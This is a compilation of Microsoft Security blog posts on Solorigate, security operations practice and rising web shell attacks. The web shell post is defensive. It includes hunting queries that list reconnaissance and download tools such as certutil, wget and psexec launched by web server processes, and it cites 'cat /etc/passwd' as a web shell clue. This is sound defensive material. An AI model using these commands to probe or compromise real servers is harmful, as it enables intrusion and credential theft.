Customer Guidance: One of the things our customers should consider is managing identity and access from the cloud. When you rely on on-premises services, like authentication server, it is up to a customer to protect their identity infrastructure. With a cloud identity, like Azure Active Directory, we protect the identity infrastructure from the cloud. Our cloud-scale machine learning systems reason over trillions of signals in real time. So, we can detect and remediate attacks that nobody else can see. 

Strengthen the community of defenders

Finally, we know that we all have an important role to play in strengthening and empowering the defender community at large. It was great to see this sharing in action in December when FireEye first alerted the community of a “global intrusion campaign.”  

At Microsoft, communicating and collaborating with our customers and partners is a top priority. Over the past several weeks, security teams across Microsoft (Microsoft Threat Intelligence Center/MSTICMicrosoft Detection and Response Team/DARTMicrosoft Cyber Defense Operations Center/CDOC and Microsoft Security Response Center/MSRC) met daily and directly collaborated with customers and partners to share information and respond. We shared the latest threat intelligence, indicators of compromise (IOC), published more than 15 blogs with technical guidance and best practices, and notified customers of potentially related activity. We also offered security trials across our end-to-end product portfolio to give organizations the tools needed to combat this threat.  

This sharing is invaluable to the entire community.  

Customer Guidance: We encourage every company, of every size, to work with the community to share information, strengthen defenses and respond to attacks. Join our Microsoft Security and Compliance Tech Community to start or participate in a variety of community discussions. 

Security is a journey of progress over perfection, and with these three approaches working in unison, we can all help to make the world more safe and secure. 

The post Turning the page on Solorigate and opening the next chapter for the security community appeared first on Microsoft Security.

Categories: cybersecurity Tags:

Afternoon Cyber Tea: Evaluating individual and organizational cyber risk in a pandemic

February 16th, 2021 No comments

Cybersecurity professionals find themselves in high demand as organizations worldwide continue to grapple with how to secure millions of remote workers. James Turner is an industry analyst at CISO Lens and served as an adjudicator from 2017 to 2019 for the Australian government’s cyber war games: Operation Tsunami. In this episode of Afternoon Cyber Tea, James and I talk about how the COVID-19 pandemic has accelerated the critical need for cooperation across the cybersecurity industry, as well as the need for strengthening communication between governments and private organizations.

Our discussion really examines how the pandemic has pushed organizations toward greater cost efficiencies and a new mainstreaming of cybersecurity—democratizing the language and tools to make it part of everyone’s “9 to 5” experience.

“Everyone has a plan until they get hit in the face,” as James puts it. “Ransomware is off the hook—one organization just got hit with a 10 million dollar ransom. That’s more than the average Australian or New Zealand organization spends on security in a year.”

If the old saying that every crisis presents an opportunity holds true, James sees the pandemic as a tremendous catalyst for better information sharing amid budget cuts and a fragmented workforce. “The security operating centers at large banks are on speed-dial with each other because the attack against Company A hits Company B the next day. No organization, or even an entire country, can do it all by themselves.”

During our talk, we also touch on how the pandemic has pushed security professionals to look at new ways of optimizing delivery, such as utilizing an integrated security solution rather than an expensive niche product. “It’s given businesses a new appreciation for automatic patching,” James recounts. “My group of CISOs is discussing installing agents on personal devices; the legalities and logistics around that. Budgets are becoming an issue; so, I’m encouraging them to think like startups—get creative.”

James and I also examine how security professionals need to do a better job of evangelizing across the entire IT sector, including developing a ground-level understanding of your own organization’s business units. Cybersecurity will only be truly effective when it’s no longer part of an org chart but simply part of everyone’s job.

To hear my complete conversation with James Turner, listen to the full episode.

What’s next

In this ongoing podcast series, I talk with cybersecurity influencers about the evolving threat landscape and explore the promise of systems powered by AI, IoT, and other emerging tech. In every episode, we’ll look at empowering people and organizations to create a more secure, productive digital environment.

Listen to Afternoon Cyber Tea with Ann Johnson on:

  • Apple Podcasts: You can also download the episode by clicking the Episode Website link.
  • Podcast One: Includes the option to subscribe, so you’re notified as soon as new episodes are available.
  • CISO Spotlight page: Listen alongside our CISO Spotlight episodes, where customers and security experts discuss similar topics such as Zero Trust, compliance, going passwordless, and more.

In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter if you have guest or topic suggestions.

The post Afternoon Cyber Tea: Evaluating individual and organizational cyber risk in a pandemic appeared first on Microsoft Security.

A playbook for modernizing security operations

February 11th, 2021 No comments

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest post from our new Voice of the Community blog series, Microsoft Product Marketing Manager Natalia Godyla talks with Dave Kennedy, Founder and Chief Technology Officer at Binary Defense. Dave shares his insights on security operations—what these teams need to work effectively, best practices for maturing the security operations center (SOC), as well as the biggest security challenges in the years to come.

Natalia: What are the standard tools, roles, frameworks, and services for a security operations team? What are the basic elements a SecOps team needs to succeed?

Dave: Your security operations team must have visibility into your infrastructure, both on and off-premises. Visibility is key because many of these attacks start with one compromised asset or one compromised credential. They spread across the network and in many cases, they wreak a lot of damage. Your endpoints, network infrastructure, and cloud environments are where a lot of these issues happen. I recommend starting with high-risk areas like your endpoints.

Then, you need somewhere to ingest that data, such as security information and event management systems like Microsoft Azure Sentinel, and to go through log analysis and determine if anything has been compromised.

Also, frameworks like the MITRE ATT&CK framework are a great baseline of saying, well, here are specific attacks that we’ve seen in the wild that are mapped to specific adversaries that are in our industry vertical. That can help you prioritize those, get better at detection, and make sure you have the right logs coming into your environment to build detections.

Natalia: How can a team operationalize the MITRE ATT&CK framework?

Dave: When people first look at the MITRE ATT&CK framework, they freak out because it’s so big, but it’s a treasure trove of information. Everybody was focused on a castle mentality of being able to protect everything but what happens when an attacker is in your environment? Protection is still very important and you want to have protective mechanisms in place, but protection takes time and requires cultural changes in many cases. If you’re doing something like multifactor authentication, you have to communicate that to users.

The MITRE ATT&CK framework tells you what happens when attackers have gotten around your preventive controls. What happens when they execute code onto a system and take other actions that allow them to either extract additional information or move to different systems through lateral movement or post-exploitation scenarios and get access to the data? The MITRE ATT&CK framework is a way to conceptualize exactly what’s happening from an attacker’s standpoint and to build detections around those attack patterns.

With the damage we see, it’s usually several hours, days, or months that an attacker has had access to an environment. If we can shave that time down and detect them in the first few minutes or the first few hours of an attack and shut them down, we’ve saved our company a substantial amount of damage. It’s a framework to help you understand what’s happening in your environment and when unusual activities are occurring so you can respond much more effectively.

Natalia: How much of the MITRE ATT&CK framework should a security team build into their detections? How much should they rely on existing tools to map the framework?

Dave: Many tools today have already done a lot of mapping to things like the MITRE ATT&CK framework, but it’s not comprehensive. If you have an endpoint detection and response product, it may cover only 20 percent of the MITRE ATT&CK framework. Mapping your existing tools and technology to the MITRE ATT&CK framework is a very common practice. For instance, you may have an email gateway that uses sandboxing virtualization techniques that detonate potential malware to see whether it’s effective. That’s one component of your technology stack that can help cover certain components of the MITRE ATT&CK framework. You might have web content filtering that covers a different component of the framework, and then you have endpoint detection and responses (EDRs) that cover a percentage of the endpoint detection pieces.

Technology products can help you shave away the amount of effort that goes into the MITRE ATT&CK framework. It’s really important, though, that organizations map those out to understand where they have gaps and weaknesses. Maybe they need additional technology for better visibility into their environment. I’m a huge fan of the Windows systems service, System Monitor (Sysmon). If you talk to any incident responder, they’ll tell you that if they have access to Sysmon data logs, that’s a treasure trove of information from a threat hunting and incident response perspective.

It’s also important to look at it from an adversary perspective. Not every single adversary in the world wants to target your organization or business. If you’re in manufacturing, for instance, you’re not going to be a target of all adversaries. Look at what the adversaries do and what type of industry vertical they’re targeting so you don’t have to do everything in the MITRE ATT&CK framework. You can whittle the framework down to what’s important for you and build your detections based on which adversaries are most likely to target your organization.

Natalia: If a team has all the basics down and wants to mature their SecOps practices, what do you suggest?

Dave: Most security operations centers are very reactive. Mature organizations are moving toward more proactive hunting or threat hunting. A good example is if you’re sending all of your logs through Azure Sentinel, you can do things like Kusto Query Language and queries in analysis and data sets to look for unusual activity. These organizations go through command line arguments, service creations, parent-child process relationships, or Markov chaining, where you can look at unusual deviations of parent-child process relationships or unusual network activity.

It’s a continual progression starting off with the basics and becoming more advanced over time as you run through new emulation criteria or simulation criteria through either red teaming or automation tools. They can help you get good baselines of your environment and look for unusual traffic that may indicate a potential compromise. Adversary emulations are where you’re imitating a specific adversary attacker through known techniques discovered through data breaches. For example, we look at what happened with the SolarWinds supply chain attack—and kudos to Microsoft for all the research out there—and we say, here are the techniques these specific actors were using, and let’s build detections off of those so they can’t use them again.

More mature organizations already have that in place, and they’re moving toward what we call adversary simulation, where you take a look at an organization’s threat models and you build your attacks and techniques off of how those adversaries would operate. You don’t do it by using the same type of techniques that have previously been discovered. You’re trying to simulate what an attacker would do in an environment and can a blue team identify those.

Natalia: What are best practices for threat hunting?

Dave: Threat hunting varies based on timing and resources. It doesn’t mean you have to have dedicated resources. Threat hunting can be an exercise you conduct once a week, once a month, or once a quarter. It involves going through your data and looking for unusual activity. Look at all service creations. Look at all your command line arguments that are being passed. A large percentage of the MITRE ATT&CK framework can be covered just by parent-child process relationships and command line auditing in the environment. Look at East to West traffic, not just North to South. Look at all your audit logs. Go through Domain Name System (DNS traffic).

For instance, a user was using Outlook and then clicked on an email that opened an Excel document that triggered a macro that then called PowerShell or CMD EXE. That’s an unusual activity that you wouldn’t expect to see from a normal user so let’s hone in on that and figure out what occurred.

You can also conduct more purple teaming engagements, where you have a red team launch attacks and detection teams look through the logs at the same time to build better detections or see where you might have gaps in visibility. Companies that have threat hunting teams make it very difficult for red teamers to get around the different landmines that they’ve laid across the network.

Natalia: What should an incident response workflow look like?

Dave: An alert or unusual activity during a threat hunting exercise is usually raised to somebody to do an analysis. A SOC analyst typically has between 30 seconds and four minutes per alarm to determine whether the alarm is a false positive or something they need to analyze. Obviously, what stands out are things like obfuscation techniques, such as where you have PowerShell with a bunch of code that looks very unusual and obfuscation to try to evade endpoint protection products. Some of the more confusing ones are things like living off the land, which are attacks that leverage legitimate applications that are code signed by the operating system to download files and execute in the future.

A research phase kicks off to see what’s actually going on. If it’s determined that there is malicious activity, usually that’s when incident response kicks in. How bad is it? Have they moved to other systems? Let’s get this machine off the network and figure out everything that’s happening. Let’s do memory analysis. Let’s figure out who the actual attacker was. Can we combine this with red intelligence and determine the specific adversary? What are their capabilities? You start to build the timeline to ensure that you have all the right data and to determine if it’s a major breach or self-contained to one individual system.

We ran several incident response scenarios for customers that were impacted by the supply chain attacks on SolarWinds and the biggest challenge for the customers was their logs didn’t go back that far so it was very difficult for them to say definitively with evidence, that they know what happened.

Natalia: What does an incident responder need to succeed?

Dave: I’d strongly recommend doing an incident response readiness assessment for your organization. I also recommend centralized logging—whether that’s a security information and event management (SIEM) or a data analytics tool or a data lake—that you can comb through. I’m a huge advocate of Sysmon. You can do power execution, command line auditing, DNS traffic, process injection, and parent-child process relationships. I’d also suggest network logs. If you can do full packet captures, which not a lot of organizations can do, that’s also great. If you can pull data packets coming from a secure sockets layer (SSL) or transport layer security (TLS) and do remote memory acquisition, that’s also really important. Can we retrieve artifacts from systems in a very consistent way?

Tabletop exercises can also get executives and IT on the same page about how to handle incidents and work together. Running through very specific types of scenarios can help you figure out where you have gaps or weaknesses. When I was the Chief Security Officer at Diebold, we would run through three to four tabletop exercises a year and include our senior leadership, like our CEO and CFO, twice a year. It was eye-opening for them because they never really understood what goes into incident response and what can happen from a cyber perspective. We’d run through actual simulations and scenarios of very specific attacks and see how they would respond. Those types of scenarios really help build your team’s understanding and determine where you may need better communication, better tooling, or better ways to respond.

Natalia: What other strategies can security operators implement to try to avoid attacks?

Dave: When you look at layered defense, always improving protection is key. You don’t want to just focus on detection because you’re going to be in firefighting mode all the time. The basics really are a big deal: things like multifactor authentication, patch management, and security architecture.

Reducing the attack surface is important, such as with application control and allowed application lists. Application control is probably one of the most effective ways of shutting down most attacks out there today because you have a good baseline of your organization. That applies very consistently to things like the Zero Trust model. Become more of a service provider for your organization versus providing everything for your organization. Reducing your attack surface will eliminate the noise that incident responders or SOC analysts must deal with and allow them to focus on a lot of the high-fidelity type things that we want to see.

One of the things that I see continuously going into a lot of organizations is that they’re just always in firefighting mode, 90 percent of their alarms are false positives, and they’re in alarm fatigue. Their security operations center isn’t improving on detections. You really need somebody on the strategy side to come in and say: Can we lock our users down in a way that doesn’t hinder the business, but also lowers the attack surface?

Natalia: How does vulnerability assessment strategy fit into a SOC strategy?

Dave: Program vulnerabilities and exposures are key opportunities that attackers will use. When we look at historic data breaches, those that use direct exploitation and not phishing were using common vulnerabilities and exposures (CVE) typically of six months or older that allowed them access to a specific system. That makes it really important to reduce attack surfaces and understand where vulnerabilities are so we can make it a lot more difficult for attackers to get in.

It’s not a zero-day attack that’s hitting companies today. It’s out-of-date systems. It’s not patching appropriately. A lot of companies will do well on the operating system side. They’ll patch their Windows machines, their Linux machines, and Apple. But they fail really hard with the third-party applications and especially the web application tier of the house—middleware, microservices. In almost every case, it comes down to ownership of the application. A lot of times, IT will own the operating system platforms and the infrastructure that it’s on, but business owners typically sponsor those applications and so ownership becomes a very murky area. Is it the business owners that own the updates of the applications or does IT? Make sure you have clear owners in charge of making sure patches go out regularly.

If you’re not going through regular vulnerability assessments and looking for the vulnerabilities in your environment, you’re very predisposed to a data breach that attackers would leverage based on missing patches or missing specific security fixes. The first few stages of an attack are the most critical because that’s where most organizations have built their defenses. In the latter phases of post-exploitation, especially as you get to the exfiltration components, most organizations don’t have good detection capabilities. It’s really important to have those detection mechanisms in place ahead of time and ensure those systems are patched.

Natalia: We often discuss the challenges facing security today. Let’s take a different approach. What gives you hope?

Dave: What gives me hope is the shift in security. Ten years ago, we would go into organizations from a penetration testing perspective and just destroy these companies. And then the next year, we’d go in and we’d destroy these companies again. Their focus was always on the technical vulnerabilities and not on what happens after attackers are in your castle. The industry has really shifted toward the mindset of we have to get better at looking for deviations of patterns of behavior to be able to respond much more effectively. The industry is definitely tracking in the right direction, and that really gives me hope.

Learn how Microsoft Security solutions can help modernize Security Operations.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post A playbook for modernizing security operations appeared first on Microsoft Security.

Web shell attacks continue to rise

February 11th, 2021 No comments

One year ago, we reported the steady increase in the use of web shells in attacks worldwide. The latest Microsoft 365 Defender data shows that this trend not only continued, it accelerated: every month from August 2020 to January 2021, we registered an average of 140,000 encounters of these threats on servers, almost double the 77,000 monthly average we saw last year.

Figure 1. Web shell encounters on servers

The escalating prevalence of web shells may be attributed to how simple and effective they can be for attackers. A web shell is typically a small piece of malicious code written in typical web development programming languages (e.g., ASP, PHP, JSP) that attackers implant on web servers to provide remote access and code execution to server functions. Web shells allow attackers to run commands on servers to steal data or use the server as launch pad for other activities like credential theft, lateral movement, deployment of additional payloads, or hands-on-keyboard activity, while allowing attackers to persist in an affected organization.

As web shells are increasingly more common in attacks, both commodity and targeted, we continue to monitor and investigate this trend to ensure customers are protected. In this blog, we will discuss challenges in detecting web shells, and the Microsoft technologies and investigation tools available today that organizations can use to defend against these threats. We will also share guidance for hardening networks against web shell attacks.

Web shells as entry point for attacks

Attackers install web shells on servers by taking advantage of security gaps, typically vulnerabilities in web applications, in internet-facing servers. These attackers scan the internet, often using public scanning interfaces like, to locate servers to target. They may use previously fixed vulnerabilities that unfortunately remain unpatched in many servers, but they are also known to quickly take advantage of newly disclosed vulnerabilities.

For example, on June 30, F5 Networks released a patch for CVE-2020-5902, a remote code execution (RCE) vulnerability in Traffic Management User Interface (TMUI). The vulnerability is a directory traversal bug with a CVSS score of 9.8 out of a possible 10. Just four days later, on July 4, exploit code was added to a Metasploit module.

Figure 2. CVE-2020-5902 exploit code

The following day, Microsoft researchers started seeing the exploit being used by attackers to upload a web shell to vulnerable servers. The web shell was used to run common cryptocurrency miners. In the days that followed, industry security researchers saw the exploit being broadly used to deploy web shells, with multiple variants surfacing not long after.

This incident demonstrates the importance of keeping servers up to date and hardened against web shell attacks. Web servers are frequently accessible from the internet and can be used by attackers to gain access to a network.

Web shells as persistence mechanisms

Once installed on a server, web shells serve as one of the most effective means of persistence in an enterprise. We frequently see cases where web shells are used solely as a persistence mechanism. Web shells guarantee that a backdoor exists in a compromised network, because an attacker leaves a malicious implant after establishing an initial foothold on a server. If left undetected, web shells provide a way for attackers to continue to gather data from and monetize the networks that they have access to.

Compromise recovery cannot be successful and enduring without locating and removing attacker persistence mechanisms. And while rebuilding a single compromised system is a great solution, restoring existing assets is the only feasible option for many. So, finding and removing all backdoors is a critical aspect of compromise recovery.

And this brings us back to the challenge of web shell detection. As we mentioned earlier, web shells can be generalized as a means of executing arbitrary attacker input by way of an implant. The first challenge is dealing with just how many ways an attacker can execute code. Web applications support a great array of languages and frameworks and, thus, provide a high degree of flexibility and compatibility that attackers take advantage of.

In addition, the volume of network traffic plus the usual noise of constant internet attacks means that targeted traffic aimed at a web server can blend right in, making detection of web shells a lot harder and requiring advanced behavior-based detections that can identify and stop malicious activities that hide in plain sight.

Challenges in detecting web shells

Web shells can be built using any of several languages that are popular with web applications. Within each language, there are several means of executing arbitrary commands and there are multiple means for arbitrary attacker input. Attackers can also hide instructions in the user agent string or any of the parameters that get passed during a web server/client exchange.

Attackers combine all these options into just a couple of bytes to produce a web shell, for example:

Figure 3. Example of web shell code

In the example above, the only readable word in the web shell is “eval”, which can be easy to miss or misinterpret. When analyzing script, it is important to leverage contextual clues. For example, a scheduled task called “Update Google” that downloads and runs code from a suspicious website should be inspected more closely.

With web shells, analyzing context can be a challenge because the context is not clear until the shell is used. In the following code, the most useful clues are “system” and “cat /etc/passwd”, but they do not appear until the attacker interacts with the web shell:

Figure 4. Another example of web shell code

Another challenge in detecting web shells is uncovering intent. A harmless-seeming script can be malicious depending on intent. But when attackers can upload arbitrary input files in the web directory, then they can upload a full-featured web shell that allows arbitrary code execution—which some very simple web shells do.

These file-upload web shells are simple, lightweight, and easily overlooked because they cannot execute attacker commands on their own. Instead, they can only upload files, such as full-featured web shells, onto web servers. Because of their simplicity, they are difficult to detect and can be dismissed as benign, and so they are often used by attackers for persistence or for early stages of exploitation.

Finally, attackers are known to hide web shells in non-executable file formats, such as media files. Web servers configured to execute server-side code create additional challenges for detecting web shells, because on a web server, a media file is scanned for server-side execution instructions. Attackers can hide web shell scripts within a photo and upload it to a web server. When this file is loaded and analyzed on a workstation, the photo is harmless. But when a web browser asks a server for this file, malicious code executes server side.

These challenges in detecting web shells contribute to their increasing popularity as an attack tool. We constantly monitor how these evasive threats are utilized in cyberattacks, and we continue to improve protections. In the next section, we discuss how behavior-based detection technologies help us protect customers from web shell attacks.

How Microsoft helps defend networks against web shell attacks

Gaining visibility into internet-facing servers is key to detecting and addressing the threat of web shells. To tackle challenges in detecting these threats, Microsoft Defender for Endpoint uses a combination of durable protections that prevent web shell installation and behavior-based detections that identify related malicious activity. Microsoft Defender for Endpoint exposes malicious behavior by analyzing script file writes and process executions. Due to the nature of web shells, static analysis is not effective—as we have shown, it is relatively easy to modify web shells and bypass static protections. To effectively deliver protection, Microsoft Defender for Endpoint uses multiple layers of protection through behavior inspection.

Behavior-based blocking and containment capabilities, which use engines that specialize in detecting threats by analyzing behavior, monitor web-accessible directories for any new script file creation. While file creation events alone cannot be treated as suspicious, correlating such events with the responsible process tree can yield more reliable signals and surface malicious attempts. The engine can then remediate the script, neutralizing the primary infection vector. For example, IIS instance (w3wp.exe) running suspicious processes such as ‘cmd.exe /c echo’, ‘certutil.exe’, or ‘powershell.exe’ that result in the creation of script files in web -accessible folders is a rare event and is, thus, typically a strong sign of web server compromise and web shell installation.

Microsoft Defender for Endpoint also detects web shell installation attempts originating from remote systems within the organization using various lateral movement methods. For example, attackers have been observed to drop web shells through Windows Remote Management (WinRM) or use existing Windows commands to transfer web shells over SMB. On the web server, these remote actions are carried by system processes, thus giving visibility into the process tree. System privilege process dropping script files is another suspicious event and provides the behavior inspection engines ways to remediate the script before the attackers can perform any malicious actions.

Behavior-based protection also provides post-compromise defense in scenarios where attackers are already operating and running commands on web servers. Once attackers gain access to a server, one of their first steps is to understand the privilege and the environment they have access to by using built-in reconnaissance commands that are not typically used by web applications. IIS instance (w3wp.exe) running commands like ‘net’, ‘whoami’, ‘dir’, ‘cmd.exe’, or ‘query’, to name a few, is typically a strong early indicator of web shell activity.

IIS servers have built-in management tools used by administrators to perform various maintenance tasks. These platforms surface various PowerShell cmdlets that can expose critical information to the attackers. IIS instances (w3wp.exe) that host various web-facing client services such as Outlook on the web (formerly known as Outlook Web App or OWA) or Exchange admin center (EAC; formerly known as the Exchange Control Panel or ECP) accessing the management platform or executing below cmdlets is a suspicious activity and signifies a hands-on-keyboard attack. The behavior engine monitors execution of such cmdlets and the responsible process trees, for example:

With its behavior-based blocking and containment capabilities, Microsoft Defender for Endpoint can identify and stop behavior associated with web shell attacks. It raises alerts for these detections, enabling security operations teams to use the rich investigation tools in Microsoft Defender for Endpoint to perform additional investigation and hunting for related or similar threats.

Figure 5. Microsoft Defender for Endpoint alerts for behaviors related to web shell attacks

Microsoft 365 Defender and Microsoft Defender for Endpoint customers can also run advanced hunting queries to proactively hunt for web shell attacks:

Look for suspicious process that IIS worker process (w3wp.exe), Apache HTTP server processes (httpd.exe, visualsvnserver.exe), etc. do not typically initiate (e.g., cmd.exe and powershell.exe)

| where InitiatingProcessCommandLine has_any("beasvc.exe","coldfusion.exe","httpd.exe","owstimer.exe","visualsvnserver.exe","w3wp.exe") or InitiatingProcessCommandLine contains 'tomcat'
| where FileName != "csc.exe" // exclude csharp compiler
| where FileName != "php-cgi.exe" //exclude php group, fast cgi
| where FileName != "vbc.exe" //exclude Visual Basic Command Line Compiler
| summarize by FileName

Look for suspicious web shell execution, this can identify processes that are associated with remote execution and reconnaissance activity (example: “arp”, “certutil”, “cmd”, “echo”, “ipconfig”, “gpresult”, “hostname”, “net”, “netstat”, “nltest”, “nslookup”, “ping”, “powershell”, “psexec”, “qwinsta”, “route”, “systeminfo”, “tasklist”, “wget”, “whoami”, “wmic”, etc.)

| where InitiatingProcessParentFileName in~("beasvc.exe","coldfusion.exe","httpd.exe","owstimer.exe","visualsvnserver.exe","w3wp.exe") or InitiatingProcessParentFileName startswith "tomcat"
| where InitiatingProcessFileName in~("powershell.exe","powershell_ise.exe","cmd.exe")
| where FileName != 'conhost.exe'

Hardening servers against web shells

A single web shell allowing attackers to remotely run commands on a server can have far-reaching consequences. With script-based malware, however, everything eventually funnels to a few natural chokepoints, such as cmd.exe, powershell.exe, and cscript.exe. As with most attack vectors, prevention is critical.

Organizations can harden systems against web shell attacks by taking these preventive steps:

  • Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Use Threat and Vulnerability Management to discover and fix these weaknesses. Deploy the latest security updates as soon as they become available.
  • Implement proper segmentation of your perimeter network, such that a compromised web server does not lead to the compromise of the enterprise network.
  • Enable antivirus protection on web servers. Turn on cloud-delivered protection to get the latest defenses against new and emerging threats. Users should only be able to upload files in directories that can be scanned by antivirus and configured to not allow server-side scripting or execution.
  • Audit and review logs from web servers frequently. Be aware of all systems you expose directly to the internet.
  • Utilize the Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication among endpoints whenever possible, limiting lateral movement, as well as other attack activities.
  • Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.
  • Practice good credential hygiene. Limit the use of accounts with local or domain admin level privileges.

Web shells and the attacks that they enable are a multi-faceted threat that require comprehensive visibility across domains and platforms. Microsoft 365 Defender correlates threat data from endpoints, email and data, identities, and apps to coordinate cross-domain protection. Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.


Detection and Response Team (DART)

Microsoft Defender Security Research Team


The post Web shell attacks continue to rise appeared first on Microsoft Security.

Sophisticated cybersecurity threats demand collaborative, global response

February 4th, 2021 No comments

Microsoft’s response to Solorigate

Since December, the United States, its government, and other critical institutions including security firms have been addressing the world’s latest serious nation-state cyberattack, sometimes referred to as ‘Solorigate’ or ‘SUNBURST.’ As we shared earlier this is a moment of reckoning for our industry and needs a unified response of defenders across public and private sectors. Microsoft is committed to protecting our customers and safeguarding our communities and we are proud to partner with industry partners to respond to this attack and strengthen our collective defenses. We believe transparency and clarity are important for strong cybersecurity and in that spirit, we are sharing information about some commonly asked questions. We look forward to serving and protecting our customers and communities.

Question: What has Microsoft’s role been in the Solorigate incident?


As Brad Smith wrote on December 17, 2020, Solorigate is a moment of reckoning for security. We believe the Solorigate incident is an opportunity for the industry to work together to share information, strengthen defenses, and respond to attacks. We are proud to be part of the collaborative work being done to empower the defender community. Over the past two months, there have been several disclosures related to the Solorigate actor and Microsoft has had a unique perspective from several angles:

  • Helping investigate with FireEye.
  • Using indicators to find unusual activity and notifying customers and partners.
  • Helping with customer investigations.
  • Investigating our own environment.

In all of our investigations to date, data hosted in Microsoft services (including email) was sometimes a target in the incidents, but the attacker had gained privileged credentials in some other way.

Find the latest findings and guidance on Solorigate here.

Question: With your broad engagement, you’ve been criticized for not disclosing details as soon as you knew about them. How do you respond?


We believe the Solorigate incident is an opportunity for the industry to work together to share information, strengthen defenses, and respond to attacks.

We have a very talented and experienced cybersecurity response team. In those situations where we provide investigative support to other organizations, we are restricted from sharing details. In these engagements, as well as when we notify organizations, those organizations have control in deciding what details they disclose and when they disclose them.

Additionally, investigations sometimes discover early indicators that require further research before they are actionable. Taking the time to thoroughly investigate incidents is necessary in order to provide the best guidance to the broader security community, our customers, and our partners.

We share actionable information regularly on our Solorigate resource center, and we are committed to providing additional updates if and when we discover new information to help inform and enable the community.

Question: The Cybersecurity & Infrastructure Security Agency (CISA) says other attack vectors have been discovered apart from SolarWinds. Has Microsoft in any way been an initial entry point for the Solorigate actor?


No. In our investigations to date, data hosted in Microsoft services (including email) was sometimes a target in the incidents, but the attacker had gained privileged credentials in some other way.

From the beginning, we have said that we believe this is a sophisticated actor that has many tools in its toolkit, so it is not a surprise that a sophisticated actor would also use other methods to gain access to targets. In our investigations and through collaboration with our industry peers, we have confirmed several additional compromise techniques leveraged by the actor, including password spraying, spearphishing, use of webshell, through a web server, and delegated credentials.

As we learn more from our engagements, we will continue to improve our security products and share learnings with the community. For the most up-to-date information and guidance, please visit our resource center.

Question: What should we know about the Microsoft notifications to customers? Does that mean you detected a compromise in Microsoft services?


No, it means our telemetry indicated unusual activity in authorized accounts.

As part of the investigative team working with FireEye, we were able to analyze the attacker’s behavior with a forensic investigation and identify unusual technical indicators that would not be associated with normal user interactions. We then used our telemetry to search for those indicators and identify organizations where credentials had likely been compromised by the Solorigate actor.

Microsoft directly notifies the affected customers to provide the indicators they need to investigate the observed behavior with their organizational knowledge and within their specific context.

Question: Some have interpreted the wording in the SolarWinds 8K to mean that they were made aware of or were investigating an attack vector related to Microsoft Office 365. Has that been investigated?

The 8K wording is, “SolarWinds uses Microsoft Office 365 for its email and office productivity tools. SolarWinds was made aware of an attack vector that was used to compromise the Company’s emails and may have provided access to other data contained in the Company’s office productivity tools.”


We have investigated thoroughly and have found no evidence they were attacked via Office 365. The wording of the SolarWinds 8K filing was unfortunately ambiguous, leading to erroneous interpretation and speculation, which is not supported by the results of our investigation. SolarWinds has confirmed these findings in their blog on February 3, 2021.

Question: Reuters broke news on December 17, 2020, alleging that “Microsoft’s own products were then used to further the attacks” and saying it was not immediately clear “how many Microsoft users were affected by the tainted products.” Is that article accurate?


No, it is not accurate. As we said at the time, and based upon all investigations since, we have found no indications that our systems were used to attack others. Data hosted in Microsoft services (including email) were sometimes a post-compromise target of attack, but only after an attacker had gained privileged credentials in some other way.

Question: Some companies say the hackers entered its systems via Microsoft products. Do you dispute this?


We’ve investigated each situation as we became aware of it and in each case, data hosted in Microsoft services (including email) were a target in the incident, but the attacker had gained privileged credentials in another way.

Question: When did Microsoft know about being attacked by the Solorigate actor?


Our security teams work continually to protect users, devices, and data from ongoing threats to our environment, but the investigations specifically focused on the Solorigate actor began when we became aware of the malicious SolarWinds applications.

We published a Microsoft Internal Solorigate Investigation Update on December 31, 2020, and will provide another update soon.

Question: Given how serious Solorigate is, what can be done? What is the big takeaway?


The cybersecurity industry has long been aware that sophisticated and well-funded actors were theoretically capable of advanced techniques, patience, and operating below the radar, but this incident has proven that it isn’t just theoretical.

We believe the Solorigate incident has proven the benefit of the industry working together to share information, strengthen defenses, and respond to attacks.

Additionally, the attacks have reinforced two key points that the industry has been advocating for a while now—defense-in-depth protections and embracing a zero trust mindset.

Defense-in-depth protections and best practices are really important because each layer of defense provides an extra opportunity to detect an attack and take action before they get closer to valuable assets. We saw this ourselves in our internal investigation, where we found evidence of attempted activities that were thwarted by defense-in-depth protections. So, we again want to reiterate the value of industry best practices such as outlined here, and implementing Privileged Access Workstations (PAW) as part of a strategy to protect privileged accounts.

A zero trust, “assume breach” philosophy is an important approach to defense. Many of the techniques we’ve observed are post-compromise techniques, so security companies and Microsoft are looking for ways to improve detections and provide protection even when an attacker gains unauthorized access.

The post Sophisticated cybersecurity threats demand collaborative, global response appeared first on Microsoft Security.

Categories: cybersecurity Tags:

Automating and operationalizing data protection with Dataguise and Microsoft Information Protection

February 4th, 2021 No comments

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA

In technical literature, the terms data discovery, classification, and tagging are sometimes used interchangeably, but there are real differences in what they actually mean—and each plays a critical role in an enterprise data protection strategy.

Data discovery is the process of reporting information about the sensitivity of a data object. The granularity of reporting typically includes what type of sensitive information is found, exactly where it is found, along with the exact cardinality of sensitive data elements. Data classification is the association of a label, which typically has some business value, to an object (file or a table). Classification is often stored as metadata in a separate system or an external data catalog and enables downstream usage of a data object based on security or privacy policies. Data tagging (labeling) is the application of an actual label (or classification) to the associated object.

The important thing to note here is that data discovery is always foundational to a data protection strategy. Classification and tagging depend on accurate discovery to drive the appropriate method of protection, which will ultimately depend on the consumption or utilization and privacy requirements for the data. The more comprehensive and efficient (automated and integrated) the data discovery, the more effective and cost-effective the data protection.

Dataguise and Microsoft Information Protection: Better together

 Now, you probably know that Microsoft Information Protection is a comprehensive suite of services and features that Microsoft offers for its customers to classify, label, and protect data. Microsoft Information Protection forms the core of many enterprise data protection strategies.

